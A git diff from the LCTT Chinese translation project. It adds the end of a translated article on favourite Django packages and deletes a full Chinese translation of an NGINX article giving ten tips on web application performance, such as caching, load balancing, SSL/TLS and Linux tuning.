+这个应用支持多种认证体系,比如用户名或电子邮件。一旦用户注册成功,它可以提供从零到电子邮件认证的多种账户验证的策略。同时,它也支持多种社交账户和电子邮件账户关联。它还支持可插拔的注册表单,可让用户在注册时回答一些附加问题。
+
+django-allauth 支持多于 20 种认证提供者,包括 Facebook, Github, Google 和 Twitter。如果你发现了一个它不支持的社交网站,那很有可能有一款第三方插件提供该网站的接入支持。这个项目还支持自定义后台开发,可以支持自定义的认证方式。
+
+django-allauth 易于配置,且有[完善的文档][18]。该项目通过了很多测试,所以你可以相信它的所有部件都会正常运作。
+
+你有最喜爱的 Django 包吗?请在评论中告诉我们。
+
+## 关于作者
+
+![Photo](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/main-one-i-use-everywhere.png?itok=66GC-D1q)
+
+Jeff Triplett
+
+劳伦斯,堪萨斯州
+
+
+我在 2007 年搬到了堪萨斯州的劳伦斯,在 Django 的发源地—— Lawrence Journal-World 工作。我现在在劳伦斯市的 [Revolution Systems (Revsys)][19] 工作,做一位开发者兼顾问。
+
+我是[北美 Django 运动基金会(DEFNA)][20]的联合创始人,2015 和 2016 年 [DjangoCon US][21] 的会议主席,而且我在 Django 的发源地劳伦斯参与组织了 [Django Birthday][22] 来庆祝 Django 的 10 岁生日。
+
+我是当地越野跑小组的成员,我喜欢篮球,我还喜欢梦见自己随着一道气流游遍美国。
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/business/15/12/5-favorite-open-source-django-packages
+
+作者:[Jeff Triplett][a]
+译者:[StdioA](https://github.com/StdioA)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/jefftriplett
+[1]:https://docs.djangoproject.com/en/1.8/intro/reusable-apps/
+[2]:https://pypi.python.org/pypi?:action=browse&c=523
+[3]:https://github.com/audreyr/cookiecutter
+[4]:http://whitenoise.evans.io/en/latest/base.html
+[5]:http://www.django-rest-framework.org/
+[6]:https://wagtail.io/
+[7]:http://www.intenct.nl/projects/django-allauth/
+[8]:https://www.djangopackages.com/
+[9]:https://www.djangopackages.com/grids/g/rest/
+[10]:http://www2.ljworld.com/news/2015/jul/09/happy-birthday-django/
+[11]:https://docs.djangoproject.com/en/1.8/ref/views/#django.views.static.serve
+[12]:https://docs.djangoproject.com/en/1.8/ref/contrib/staticfiles/
+[13]:http://whitenoise.evans.io/en/latest/index.html
+[14]:http://www.django-rest-framework.org/
+[15]:http://restframework.herokuapp.com/
+[16]:http://django-rest-swagger.readthedocs.org/en/latest/index.html
+[17]:https://opensource.com/business/15/5/wagtail-cms
+[18]:http://django-allauth.readthedocs.org/en/latest/
+[19]:http://www.revsys.com/
+[20]:http://defna.org/
+[21]:https://2015.djangocon.us/
+[22]:https://djangobirthday.com/
diff --git a/translated/tech/20151028 10 Tips for 10x Application Performance.md b/translated/tech/20151028 10 Tips for 10x Application Performance.md
deleted file mode 100644
index 55cd24bd9a..0000000000
--- a/translated/tech/20151028 10 Tips for 10x Application Performance.md
+++ /dev/null
@@ -1,279 +0,0 @@
-10 Tips for 10x Application Performance
-
-将程序性能提高十倍的10条建议
-================================================================================
-
-提高web 应用的性能从来没有比现在更关键过。网络经济的比重一直在增长;全球经济超过5% 的价值是在因特网上产生的(数据参见下面的资料)。我们的永远在线、超级连接的世界意味着用户的期望值也处于历史上的最高点。如果你的网站不能及时的响应,或者你的app 不能无延时的工作,用户会很快的投奔到你的竞争对手那里。
-
-举一个例子,一份亚马逊十年前做过的研究可以证明,甚至在那个时候,网页加载时间每减少100毫秒,收入就会增加1%。另一个最近的研究特别强调一个事实,即超过一半的网站拥有着在调查中说他们会因为应用程序性能的问题流失用户。
-
-网站到底需要多块呢?对于页面加载,每增加1秒钟就有4%的用户放弃使用。顶级的电子商务站点的页面在第一次交互时可以做到1秒到3秒加载时间,而这是提供最高舒适度的速度。很明显这种利害关系对于web 应用来说很高,而且在不断的增加。
-
-想要提高效率很简单,但是看到实际结果很难。要在旅途上帮助你,这篇blog 会给你提供10条最高可以10倍的提升网站性能的建议。这是系列介绍提高应用程序性能的第一篇文章,包括测试充分的优化技术和一点NGIX 的帮助。这个系列给出了潜在的提高安全性的帮助。
-
-### Tip #1: 通过反向代理来提高性能和增加安全性 ###
-
-如果你的web 应用运行在单个机器上,那么这个办法会明显的提升性能:只需要添加一个更快的机器,更好的处理器,更多的内存,更快的磁盘阵列,等等。然后新机器就可以更快的运行你的WordPress 服务器, Node.js 程序, Java 程序,以及其它程序。(如果你的程序要访问数据库服务器,那么这个办法还是很简单:添加两个更快的机器,以及在两台电脑之间使用一个更快的链路。)
-
-问题是,机器速度可能并不是问题。web 程序运行慢经常是因为计算机一直在不同的任务之间切换:和用户的成千上万的连接,从磁盘访问文件,运行代码,等等。应用服务器可能会抖动-内存不足,将内存数据写会磁盘,以及多个请求等待一个任务完成,如磁盘I/O。
-
-你可以采取一个完全不同的方案来替代升级硬件:添加一个反向代理服务器来分担部分任务。[反向代理服务器][1] 位于运行应用的机器的前端,是用来处理网络流量的。只有反向代理服务器是直接连接到互联网的;和程序的通讯都是通过一个快速的内部网络完成的。
-
-使用反向代理服务器可以将应用服务器从等待用户与web 程序交互解放出来,这样应用服务器就可以专注于为反向代理服务器构建网页,让其能够传输到互联网上。而应用服务器就不需要在能带客户端的响应,可以运行与接近优化过的性能水平。
-
-添加方向代理服务器还可以给你的web 服务器安装带来灵活性。比如,一个已知类型的服务器已经超载了,那么就可以轻松的添加另一个相同的服务器;如果某个机器宕机了,也可以很容易的被替代。
-
-因为反向代理带来的灵活性,所以方向代理也是一些性能加速功能的必要前提,比如:
-
-- **负载均衡** (参见 [Tip #2][2]) – 负载均衡运行在方向代理服务器上,用来将流量均衡分配给一批应用。有了合适的负载均衡,你就可以在不改变程序的前提下添加应用服务器。
-- **缓存静态文件** (参见 [Tip #3][3]) – 直接读取的文件,比如图像或者代码,可以保存在方向代理服务器,然后直接发给客户端,这样就可以提高速度、分担应用服务器的负载,可以让应用运行的更快
-- **网站安全** – 反响代理服务器可以提高网站安全性,以及快速的发现和响应攻击,保证应用服务器处于被保护状态。
-
-NGINX 软件是一个专门设计的反响代理服务器,也包含了上述的多种功能。NGINX 使用事件驱动的方式处理问题,着回避传统的服务器更加有效率。NGINX plus 天价了更多高级的反向代理特性,比如程序[健康度检查][4],专门用来处理request 路由,高级缓冲和相关支持。
-
-![NGINX Worker Process helps increase application performance](https://www.nginx.com/wp-content/uploads/2015/10/Graph-11.png)
-
-### Tip #2: 添加负载平衡 ###
-
-添加一个[负载均衡服务器][5] 是一个相当简单的用来提高性能和网站安全性的的方法。使用负载均衡讲流量分配到多个服务器,是用来替代只使用一个巨大且高性能web 服务器的方案。即使程序写的不好,或者在扩容方面有困难,只使用负载均衡服务器就可以很好的提高用户体验。
-
-负载均衡服务器首先是一个反响代理服务器(参见[Tip #1][6])——它接收来自互联网的流量,然后转发请求给另一个服务器。小戏法是负载均衡服务器支持两个或多个应用服务器,使用[分配算法][7]将请求转发给不同服务器。最简单的负载均衡方法是轮转法,只需要将新的请求发给列表里的下一个服务器。其它的方法包括将请求发给负载最小的活动连接。NGINX plus 拥有将特定用户的会话分配给同一个服务器的[能力][8].
-
-负载均衡可以很好的提高性能是因为它可以避免某个服务器过载而另一些服务器却没有流量来处理。它也可以简单的扩展服务器规模,因为你可以添加多个价格相对便宜的服务器并且保证它们被充分利用了。
-
-可以进行负载均衡的协议包括HTTP, HTTPS, SPDY, HTTP/2, WebSocket,[FastCGI][9],SCGI,uwsgi, memcached,以及集中其它的应用类型,包括采用TCP 第4层协议的程序。分析你的web 应用来决定那些你要使用以及那些地方的性能不足。
-
-相同的服务器或服务器群可以被用来进行负载均衡,也可以用来处理其它的任务,如SSL 终止,提供对客户端使用的HTTP/1/x 和 HTTP/2 ,以及缓存静态文件。
-
-NGINX 经常被用来进行负载均衡;要想了解更多的情况可以访问我们的[overview blog post][10], [configuration blog post][11], [ebook][12] 以及相关网站 [webinar][13], 和 [documentation][14]。我们的商业版本 [NGINX Plus][15] 支持更多优化了的负载均衡特性,如基于服务器响应时间的加载路由和Microsoft’s NTLM 协议上的负载均衡。
-
-### Tip #3: 缓存静态和动态的内容 ###
-
-缓存通过加速内容的传输速度来提高web 应用的性能。它可以采用一下集中策略:当需要的时候预处理要传输的内容,保存数据到速度更快的设备,把数据存储在距离客户端更近的位置,或者结合起来使用。
-
-下面要考虑两种不同类型数据的缓冲:
-
-- **静态内容缓存**。不经常变化的文件,比如图像(JPEG,PNG) 和代码(CSS,JavaScript),可以保存在边缘服务器,这样就可以快速的从内存和磁盘上提取。
-- **动态内容缓存**。很多web 应用回针对每个网页请求生成不同的HTML 页面。在短时间内简单的缓存每个生成HTML 内容,就可以很好的减少要生成的内容的数量,这完全可以达到你的要求。
-
-举个例子,如果一个页面每秒会被浏览10次,你将它缓存1 秒,99%请求的页面都会直接从缓存提取。如果你将将数据分成静态内容,甚至新生成的页面可能都是由这些缓存构成的。
-
-下面由是web 应用发明的三种主要的缓存技术:
-
-- **缩短数据与用户的距离**。把一份内容的拷贝放的离用户更近点来减少传输时间。
-- **提高内容服务器的速度**。内容可以保存在一个更快的服务器上来减少提取文件的时间。
-- **从过载服务器拿走数据**。机器经常因为要完成某些其它的任务而造成某个任务的执行速度比测试结果要差。将数据缓存在不同的机器上可以提高缓存资源和非缓存资源的效率,而这知识因为主机没有被过度使用。
-
-对web 应用的缓存机制可以web 应用服务器内部实现。第一,缓存动态内容是用来减少应用服务器加载动态内容的时间。然后,缓存静态内容(包括动态内容的临时拷贝)是为了更进一步的分担应用服务器的负载。而且缓存之后会从应用服务器转移到对用户而言更快、更近的机器,从而减少应用服务器的压力,减少提取数据和传输数据的时间。
-
-改进过的缓存方案可以极大的提高应用的速度。对于大多数网页来说,静态数据,比如大图像文件,构成了超过一半的内容。如果没有缓存,那么这可能会花费几秒的时间来提取和传输这类数据,但是采用了缓存之后不到1秒就可以完成。
-
-举一个在实际中缓存是如何使用的例子, NGINX 和NGINX Plus使用了两条指令来[设置缓存机制][16]:proxy_cache_path 和 proxy_cache。你可以指定缓存的位置和大小,文件在缓存中保存的最长时间和其他一些参数。使用第三条(而且是相当受欢迎的一条)指令,proxy_cache_use_stale,如果服务器提供新鲜内容是忙或者挂掉之类的信息,你甚至可以让缓存提供旧的内容,这样客户端就不会一无所得。从用户的角度来看这可以很好的提高你的网站或者应用的上线时间。
-
-NGINX plus 拥有[高级缓存特性][17],包括对[缓存清除][18]的支持和在[仪表盘][19]上显示缓存状态信息。
-
-要想获得更多关于NGINX 的缓存机制的信息可以浏览NGINX Plus 管理员指南中的 [reference documentation][20] 和 [NGINX Content Caching][21] 。
-
-**注意**:缓存机制分布于应用开发者、投资决策者以及实际的系统运维人员之间。本文提到的一些复杂的缓存机制从[DevOps 的角度][23]来看很具有价值,即对集应用开发者、架构师以及运维操作人员的功能为一体的工程师来说可以满足他们对站点功能性、响应时间、安全性和商业结果,如完成的交易数。
-
-### Tip #4: 压缩数据 ###
-
-压缩是一个具有很大潜力的提高性能的加速方法。现在已经有一些针对照片(JPEG 和PNG)、视频(MPEG-4)和音乐(MP3)等各类文件精心设计和高压缩率的标准。每一个标准都或多或少的减少了文件的大小。
-
-文本数据 —— 包括HTML(包含了纯文本和HTL 标签),CSS和代码,比如Javascript —— 经常是未经压缩就传输的。压缩这类数据会在对应用程序性能的感觉上,特别是处于慢速或受限的移动网络的客户端,产生不成比例的影响。
-
-这是因为文本数据经常是用户与网页交互的有效数据,而多媒体数据可能更多的是起提供支持或者装饰的作用。聪明的内容压缩可以减少HTML,Javascript,CSS和其他文本内容对贷款的要求,通常可以减少30% 甚至更多的带宽和相应的页面加载时间。
-
-如果你是用SSL,压缩可以减少需要进行SSL 编码的的数据量,而这些编码操作会占用一些CPU时间而抵消了压缩数据减少的时间。
-
-压缩文本数据的方法很多,举个例子,在定义小说文本压缩模式的[HTTP/2 部分]就专门为适应头数据。另一个例子是可以在NGINX 里打开使用GZIP 压缩文本。你在你的服务里[预压缩文本数据][25]之后,你就可以直接使用gzip_static 指令来处理压缩过的.gz 版本。
-
-### Tip #5: 优化 SSL/TLS ###
-
-安全套接字([SSL][26]) 协议和它的继承者,传输层安全(TLS)协议正在被越来越多的网站采用。SSL/TLS 对从原始服务器发往用户的数据进行加密提高了网站的安全性。影响这个趋势的部分原因是Google 正在使用SSL/TLS,这在搜索引擎排名上是一个正面的影响因素。
-
-尽管SSL/TLS 越来越流行,但是使用加密对速度的影响也让很多网站望而却步。SSL/TLS 之所以让网站变的更慢,原因有二:
-
-1. 任何一个连接第一次连接时的握手过程都需要传递密钥。而采用HTTP/1.x 协议的浏览器在建立多个连接时会对每个连接重复上述操作。
-2. 数据在传输过程中需要不断的在服务器加密、在客户端解密。
-
-要鼓励使用SSL/TLS,HTTP/2 和SPDY(在[下一章][27]会描述)的作者设计新的协议来让浏览器只需要对一个浏览器会话使用一个连接。这会大大的减少上述两个原因中的一个浪费的时间。然而现在可以用来提高应用程序使用SSL/TLS 传输数据的性能的方法不止这些。
-
-web 服务器有对应的机制优化SSL/TLS 传输。举个例子,NGINX 使用[OpenSSL][28]运行在普通的硬件上提供接近专用硬件的传输性能。NGINX [SSL 性能][29] 有详细的文档,而且把对SSL/TLS 数据进行加解密的时间和CPU 占用率降低了很多。
-
-更进一步,在这篇[blog][30]有详细的说明如何提高SSL/TLS 性能,可以总结为一下几点:
-
-- **会话缓冲**。使用指令[ssl_session_cache][31]可以缓存每个新的SSL/TLS 连接使用的参数。
-- **会话票据或者ID**。把SSL/TLS 的信息保存在一个票据或者ID 里可以流畅的复用而不需要重新握手。
-- **OCSP 分割**。通过缓存SSL/TLS 证书信息来减少握手时间。
-
-NGINX 和NGINX Plus 可以被用作SSL/TLS 终结——处理客户端流量的加密和解密,而同时和其他服务器进行明文通信。使用[这几步][32] 来设置NGINX 和NGINX Plus 处理SSL/TLS 终止。同时,这里还有一些NGINX Plus 和接收TCP 连接的服务器一起使用时的[特有的步骤][33]
-
-### Tip #6: 使用 HTTP/2 或 SPDY ###
-
-对于已经使用了SSL/TLS 的站点,HTTP/2 和SPDY 可以很好的提高性能,因为每个连接只需要一次握手。而对于没有使用SSL/TLS 的站点来说,HTTP/2 和SPDY会在响应速度上有些影响(通常会将度效率)。
-
-Google 在2012年开始把SPDY 作为一个比HTTP/1.x 更快速的协议来推荐。HTTP/2 是目前IETF 标准,他也基于SPDY。SPDY 已经被广泛的支持了,但是很快就会被HTTP/2 替代。
-
-SPDY 和HTTP/2 的关键是用单连接来替代多路连接。单个连接是被复用的,所以它可以同时携带多个请求和响应的分片。
-
-通过使用一个连接这些协议可以避免过多的设置和管理多个连接,就像浏览器实现了HTTP/1.x 一样。单连接在对SSL 特别有效,这是因为它可以最小化SSL/TLS 建立安全链接时的握手时间。
-
-SPDY 协议需要使用SSL/TLS, 而HTTP/2 官方并不需要,但是目前所有支持HTTP/2的浏览器只有在使能了SSL/TLS 的情况下才会使用它。这就意味着支持HTTP/2 的浏览器只有在网站使用了SSL 并且服务器接收HTTP/2 流量的情况下才会启用HTTP/2。否则的话浏览器就会使用HTTP/1.x 协议。
-
-当你实现SPDY 或者HTTP/2时,你不再需要通常的HTTP 性能优化方案,比如域分隔资源聚合,以及图像登记。这些改变可以让你的代码和部署变得更简单和更易于管理。要了解HTTP/2 带来的这些变化可以浏览我们的[白皮书][34]。
-
-![NGINX Supports SPDY and HTTP/2 for increased web application performance](https://www.nginx.com/wp-content/uploads/2015/10/http2-27.png)
-
-作为支持这些协议的一个样例,NGINX 已经从一开始就支持了SPDY,而且[大部分使用SPDY 协议的网站][35]都运行的是NGINX。NGINX 同时也[很早][36]对HTTP/2 的提供了支持,从2015 年9月开始开源NGINX 和NGINX Plus 就[支持][37]它了。
-
-经过一段时间,我们NGINX 希望更多的站点完全是能SSL 并且向HTTP/2 迁移。这将会提高安全性,同时新的优化手段也会被发现和实现,更简单的代码表现的更加优异。
-
-### Tip #7: 升级软件版本 ###
-
-一个提高应用性能的简单办法是根据软件的稳定性和性能的评价来选在你的软件栈。进一步说,因为高性能组件的开发者更愿意追求更高的性能和解决bug ,所以值得使用最新版本的软件。新版本往往更受开发者和用户社区的关注。更新的版本往往会利用到新的编译器优化,包括对新硬件的调优。
-
-稳定的新版本通常比旧版本具有更好的兼容性和更高的性能。一直进行软件更新,可以非常简单的保持软件保持最佳的优化,解决掉bug,以及安全性的提高。
-
-一直使用旧版软件也会组织你利用新的特性。比如上面说到的HTTP/2,目前要求OpenSSL 1.0.1.在2016 年中期开始将会要求1.0.2 ,而这是在2015年1月才发布的。
-
-NGINX 用户可以开始迁移到[NGINX 最新的开源软件][38] 或者[NGINX Plus][39];他们都包含了罪行的能力,如socket分区和线程池(见下文),这些都已经为性能优化过了。然后好好看看的你软件栈,把他们升级到你能能升级道德最新版本吧。
-
-### Tip #8: linux 系统性能调优 ###
-
-linux 是大多数web 服务器使用操作系统,而且作为你的架构的基础,Linux 表现出明显可以提高性能的机会。默认情况下,很多linux 系统都被设置为使用很少的资源,匹配典型的桌面应用负载。这就意味着web 应用需要最少一些等级的调优才能达到最大效能。
-
-Linux 优化是转变们针对web 服务器方面的。以NGINX 为例,这里有一些在加速linux 时需要强调的变化:
-
-- **缓冲队列**。如果你有挂起的连接,那么你应该考虑增加net.core.somaxconn 的值,它代表了可以缓存的连接的最大数量。如果连接线直太小,那么你将会看到错误信息,而你可以逐渐的增加这个参数知道错误信息停止出现。
-- **文件描述符**。NGINX 对一个连接使用最多2个文件描述符。如果你的系统有很多连接,你可能就需要提高sys.fs.file_max ,增加系统对文件描述符数量整体的限制,这样子才能支持不断增加的负载需求。
-- **临时端口**。当使用代理时,NGINX 会为每个上游服务器创建临时端口。你可以设置net.ipv4.ip_local_port_range 来提高这些端口的范围,增加可用的端口。你也可以减少非活动的端口的超时判断来重复使用端口,这可以通过net.ipv4.tcp_fin_timeout 来设置,这可以快速的提高流量。
-
-对于NGINX 来说,可以查阅[NGINX 性能调优指南][40]来学习如果优化你的Linux 系统,这样子它就可以很好的适应大规模网络流量而不会超过工作极限。
-
-### Tip #9: web 服务器性能调优 ###
-
-无论你是用哪种web 服务器,你都需要对它进行优化来提高性能。下面的推荐手段可以用于任何web 服务器,但是一些设置是针对NGINX的。关键的优化手段包括:
-
-- **f访问日志**。不要把每个请求的日志都直接写回磁盘,你可以在内存将日志缓存起来然后一批写回磁盘。对于NGINX 来说添加给指令*access_log* 添加参数 *buffer=size* 可以让系统在缓存满了的情况下才把日志写到此哦按。如果你添加了参数**flush=time** ,那么缓存内容会每隔一段时间再写回磁盘。
-- **缓存**。缓存掌握了内存中的部分资源知道满了位置,这可以让与客户端的通信更加高效。与内存中缓存不匹配的响应会写回磁盘,而这就会降低效能。当NGINX [启用][42]了缓存机制后,你可以使用指令*proxy_buffer_size* 和 *proxy_buffers* 来管理缓存。
-- **客户端保活**。保活连接可以减少开销,特别是使用SSL/TLS时。对于NGINX 来说,你可以增加*keepalive_requests* 的值,从默认值100 开始修改,这样一个客户端就可以转交一个指定的连接,而且你也可以通过增加*keepalive_timeout* 的值来允许保活连接存活更长时间,结果就是让后来的请求处理的更快速。
-- **上游保活**。上游的连接——即连接到应用服务器、数据库服务器等机器的连接——同样也会收益于连接保活。对于上游连接老说,你可以增加*保活时间*,即每个工人进程的空闲保活连接个数。这就可以提高连接的复用次数,减少需要重新打开全新的连接次数。更多关于保活连接的信息可以参见[blog][41].
-- **限制**。限制客户端使用的资源可以提高性能和安全性。对于NGINX 来说指令*limit_conn* 和 *limit_conn_zone* 限制了每个源的连接数量,而*limit_rate* 限制了带宽。这些限制都可以阻止合法用户*攫取* 资源,同时夜避免了攻击。指令*limit_req* 和 *limit_req_zone* 限制了客户端请求。对于上游服务器来说,可以在上游服务器的配置块里使用max_conns 可以限制连接到上游服务器的连接。 这样可以避免服务器过载。关联的队列指令会创建一个队列来在连接数抵达*max_conn* 限制时在指定的长度的时间内保存特定数量的请求。
-- **工人进程**。工人进程负责处理请求。NGINX 采用事件驱动模型和依赖操作系统的机制来有效的讲请求分发给不同的工人进程。这条建议推荐设置每个CPU 的参数*worker_processes* 。如果需要的话,工人连接的最大数(默认512)可以安全在大部分系统增加,是指找到最适合你的系统的值。
-- **套接字分割**。通常一个套接字监听器会把新连接分配给所有工人进程。套接字分割会未每个工人进程创建一个套接字监听器,这样一来以内核分配连接给套接字就成为可能了。折可以减少锁竞争,并且提高多核系统的性能,要使能[套接字分隔][43]需要在监听指令里面加上复用端口参数。
-- **线程池**。一个计算机进程可以处理一个缓慢的操作。对于web 服务器软件来说磁盘访问会影响很多更快的操作,比如计算或者在内存中拷贝。使用了线程池之后慢操作可以分配到不同的任务集,而主进程可以一直运行快速操作。当磁盘操作完成后结果会返回给主进程的循环。在NGINX理有两个操作——read()系统调用和sendfile() ——被分配到了[线程池][44]
-
-![Thread pools help increase application performance by assigning a slow operation to a separate set of tasks](https://www.nginx.com/wp-content/uploads/2015/10/Graph-17.png)
-
-**技巧**。当改变任务操作系统或支持服务的设置时,一次只改变一个参数然后测试性能。如果修改引起问题了,或者不能让你的系统更快那么就改回去。
-
-在[blog][45]可以看到更详细的NGINX 调优方法。
-
-### Tip #10: 监视系统活动来解决问题和瓶颈 ###
-
-在应用开发中要使得系统变得非常高效的关键是监视你的系统在现实世界运行的性能。你必须能通过特定的设备和你的web 基础设施上监控程序活动。
-
-监视活动是最积极的——他会告诉你发生了什么,把问题留给你发现和最终解决掉。
-
-监视可以发现集中不同的问题。它们包括:
-
-- 服务器宕机。
-- 服务器出问题一直在丢失连接。
-- 服务器出现大量的缓存未命中。
-- 服务器没有发送正确的内容。
-
-应用的总体性能监控工具,比如New Relic 和Dynatrace,可以帮助你监控到从远处加载网页的时间,二NGINX 可以帮助你监控到应用发送的时 间。当你需要考虑为基础设施添加容量以满足流量需求时,应用性能数据可以告诉你你的优化措施的确起作用了。
-
-为了帮助开发者快速的发现、解决问题,NGINX Plus 增加了[应用感知健康度检查][46] ——对重复出现的常规事件进行综合分析并在问题出现时向你发出警告。NGINX Plus 同时提供[会话过滤][47] 功能,折可以组织当前任务未完成之前不接受新的连接,另一个功能是慢启动,允许一个从错误恢复过来的服务器追赶上负载均衡服务器群的速度。当有使用得当时,健康度检查可以让你在问题变得严重到影响用户体验前就发现它,而会话过滤和慢启动可以让你替换服务器,并且这个过程不会对性能和正常运行时间产生负面影响。这个表格就展示了NGINX Plus 内建模块在web 基础设施[监视活活动][48]的仪表盘,包括了服务器群,TCP 连接和缓存等信息。
-
-![Use real-time application performance monitoring tools to identify and resolve issues quickly](https://www.nginx.com/wp-content/uploads/2015/10/Screen-Shot-2015-10-05-at-4.16.32-PM.png)
-
-### 总结: 看看10倍性能提升的效果 ###
-
-这些性能提升方案对任何一个web 应用都可用并且效果都很好,而实际效果取决于你的预算,如你能花费的时间,目前实现方案的差距。所以你该如何对你自己的应用实现10倍性能提升?
-
-为了指导你了解每种优化手段的潜在影响,这里是是上面详述的每个优化方法的关键点,虽然你的里程肯定大不相同:
-
-- **反向代理服务器和负载均衡**。没有负载均衡或者负载均衡很差都会造成间断的极低性能。增加一个反向代理,比如NGINX可以避免web应用程序在内存和磁盘之间抖动。负载均衡可以将过载服务器的任务转移到空闲的服务器,还可以轻松的进行扩容。这些改变都可以产生巨大的性能提升,很容易就可以比你现在的实现方案的最差性能提高10倍,对于总体性能来说可能提高的不多,但是也是有实质性的提升。
-- **缓存动态和静态数据**。如果你又一个web 服务器负担过重,那么毫无疑问肯定是你的应用服务器,只通过缓存动态数据就可以在峰值时间提高10倍的性能。缓存静态文件可以提高个位数倍的性能。
-- **压缩数据**。使用媒体文件压缩格式,比如图像格式JPEG,图形格式PNG,视频格式MPEG-4,音乐文件格式MP3可以极大的提高性能。一旦这些都用上了,然后压缩文件数据可以提高初始页面加载速度提高两倍。
-- **优化SSL/TLS**。安全握手会对性能产生巨大的影响,对他们的优化可能会对初始响应特别是重文本站点产生2倍的提升。优化SSL/TLS 下媒体文件只会产生很小的性能提升。
-- **使用HTTP/2 和SPDY*。当你使用了SSL/TLS,这些协议就可以提高整个站点的性能。
-- **对linux 和web 服务器软件进行调优**。比如优化缓存机制,使用保活连接,分配时间敏感型任务到不同的线程池可以明显的提高性能;举个例子,线程池可以加速对磁盘敏感的任务[近一个数量级][49].
-
-我们希望你亲自尝试这些技术。我们希望这些提高应用性能的手段可以被你实现。请在下面评论栏分享你的结果 或者在标签#NGINX 和#webperf 下tweet 你的故事。
-### 网上资源 ###
-
-[Statista.com – Share of the internet economy in the gross domestic product in G-20 countries in 2016][50]
-
-[Load Impact – How Bad Performance Impacts Ecommerce Sales][51]
-
-[Kissmetrics – How Loading Time Affects Your Bottom Line (infographic)][52]
-
-[Econsultancy – Site speed: case studies, tips and tools for improving your conversion rate][53]
-
---------------------------------------------------------------------------------
-
-via: https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io
-
-作者:[Floyd Smith][a]
-译者:[Ezio]](https://github.com/oska874)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.nginx.com/blog/author/floyd/
-[1]:https://www.nginx.com/resources/glossary/reverse-proxy-server
-[2]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip2
-[3]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip3
-[4]:https://www.nginx.com/products/application-health-checks/
-[5]:https://www.nginx.com/solutions/load-balancing/
-[6]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip1
-[7]:https://www.nginx.com/resources/admin-guide/load-balancer/
-[8]:https://www.nginx.com/blog/load-balancing-with-nginx-plus/
-[9]:https://www.digitalocean.com/community/tutorials/understanding-and-implementing-fastcgi-proxying-in-nginx
-[10]:https://www.nginx.com/blog/five-reasons-use-software-load-balancer/
-[11]:https://www.nginx.com/blog/load-balancing-with-nginx-plus/
-[12]:https://www.nginx.com/resources/ebook/five-reasons-choose-software-load-balancer/
-[13]:https://www.nginx.com/resources/webinars/choose-software-based-load-balancer-45-min/
-[14]:https://www.nginx.com/resources/admin-guide/load-balancer/
-[15]:https://www.nginx.com/products/
-[16]:https://www.nginx.com/blog/nginx-caching-guide/
-[17]:https://www.nginx.com/products/content-caching-nginx-plus/
-[18]:http://nginx.org/en/docs/http/ngx_http_proxy_module.html?&_ga=1.95342300.1348073562.1438712874#proxy_cache_purge
-[19]:https://www.nginx.com/products/live-activity-monitoring/
-[20]:http://nginx.org/en/docs/http/ngx_http_proxy_module.html?&&&_ga=1.61156076.1348073562.1438712874#proxy_cache
-[21]:https://www.nginx.com/resources/admin-guide/content-caching
-[22]:https://www.nginx.com/blog/network-vs-devops-how-to-manage-your-control-issues/
-[23]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip6
-[24]:https://www.nginx.com/resources/admin-guide/compression-and-decompression/
-[25]:http://nginx.org/en/docs/http/ngx_http_gzip_static_module.html
-[26]:https://www.digicert.com/ssl.htm
-[27]:https://www.nginx.com/blog/10-tips-for-10x-application-performance/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#tip6
-[28]:http://openssl.org/
-[29]:https://www.nginx.com/blog/nginx-ssl-performance/
-[30]:https://www.nginx.com/blog/improve-seo-https-nginx/
-[31]:http://nginx.org/en/docs/http/ngx_http_ssl_module.html#ssl_session_cache
-[32]:https://www.nginx.com/resources/admin-guide/nginx-ssl-termination/
-[33]:https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-termination/
-[34]:https://www.nginx.com/resources/datasheet/datasheet-nginx-http2-whitepaper/
-[35]:http://w3techs.com/blog/entry/25_percent_of_the_web_runs_nginx_including_46_6_percent_of_the_top_10000_sites
-[36]:https://www.nginx.com/blog/how-nginx-plans-to-support-http2/
-[37]:https://www.nginx.com/blog/nginx-plus-r7-released/
-[38]:http://nginx.org/en/download.html
-[39]:https://www.nginx.com/products/
-[40]:https://www.nginx.com/blog/tuning-nginx/
-[41]:https://www.nginx.com/blog/http-keepalives-and-web-performance/
-[42]:http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_buffering
-[43]:https://www.nginx.com/blog/socket-sharding-nginx-release-1-9-1/
-[44]:https://www.nginx.com/blog/thread-pools-boost-performance-9x/
-[45]:https://www.nginx.com/blog/tuning-nginx/
-[46]:https://www.nginx.com/products/application-health-checks/
-[47]:https://www.nginx.com/products/session-persistence/#session-draining
-[48]:https://www.nginx.com/products/live-activity-monitoring/
-[49]:https://www.nginx.com/blog/thread-pools-boost-performance-9x/
-[50]:http://www.statista.com/statistics/250703/forecast-of-internet-economy-as-percentage-of-gdp-in-g-20-countries/
-[51]:http://blog.loadimpact.com/blog/how-bad-performance-impacts-ecommerce-sales-part-i/
-[52]:https://blog.kissmetrics.com/loading-time/?wide=1
-[53]:https://econsultancy.com/blog/10936-site-speed-case-studies-tips-and-tools-for-improving-your-conversion-rate/
diff --git a/translated/tech/20151114 How to Setup Drone - a Continuous Integration Service in Linux.md b/translated/tech/20151114 How to Setup Drone - a Continuous Integration Service in Linux.md
deleted file mode 100644
index 077c945b9c..0000000000
